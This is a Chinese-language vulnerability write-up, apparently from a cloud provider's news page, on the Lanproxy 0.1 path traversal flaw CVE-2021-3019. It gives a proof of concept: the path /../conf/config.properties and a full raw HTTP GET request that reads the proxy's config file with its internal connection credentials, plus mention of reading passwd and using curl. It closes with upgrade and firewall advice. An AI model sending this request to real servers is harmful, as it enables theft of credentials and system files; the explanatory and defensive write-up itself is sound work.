温馨提示×

温馨提示×

您好,登录后才能下订单哦!

密码登录×
登录注册×
其他方式登录
点击 登录注册 即表示同意《亿速云用户服务条款》

Lanproxy路径遍历漏洞CVE-2021-3019如何理解

发布时间:2021-12-28 19:58:38 来源:亿速云 阅读:221 作者:柒染 栏目:安全技术

Lanproxy路径遍历漏洞CVE-2021-3019如何理解,相信很多没有经验的人对此束手无策,为此本文总结了问题出现的原因和解决方法,通过这篇文章希望你能解决这个问题。

Lanproxy路径遍历漏洞CVE-2021-3019如何理解

Lanproxy 路径遍历漏洞 (CVE-2021-3019)

一、漏洞简介

Lanproxy是一个将局域网个人电脑、服务器代理到公网的内网穿透工具,支持tcp流量转发,可支持任何tcp上层协议(访问内网网站、本地支付接口调试、ssh访问、远程桌面等等)本次Lanproxy 路径遍历漏洞 (CVE-2021-3019)通过../绕过读取任意文件。该漏洞允许目录遍历读取/../conf/config.properties来获取到内部网连接的凭据。

二、影响版本

lanproxy 0.1

三、漏洞复现

环境安装移步:

https://www.jianshu.com/p/6482ac354d34

Poc:/../conf/config.properties

Lanproxy路径遍历漏洞CVE-2021-3019如何理解

GET/../conf/config.propertiesHTTP/1.1Host: 127.0.0.1:8080Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.67 Safari/537.36 Edg/87.0.664.52Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6Connection: close

读取passwd

Lanproxy路径遍历漏洞CVE-2021-3019如何理解

curl访问也行

Lanproxy路径遍历漏洞CVE-2021-3019如何理解

四、安全建议

升级版本,和防火墙做相关路径../跳跃限制。

看完上述内容,你们掌握Lanproxy路径遍历漏洞CVE-2021-3019如何理解的方法了吗?如果还想学到更多技能或想了解更多相关内容,欢迎关注亿速云行业资讯频道,感谢各位的阅读!

向AI问一下细节

免责声明:本站发布的内容(图片、视频和文字)以原创、转载和分享为主,文章观点不代表本网站立场,如果涉及侵权请联系站长邮箱:is@yisu.com进行举报,并提供相关证据,一经查实,将立刻删除涉嫌侵权内容。

AI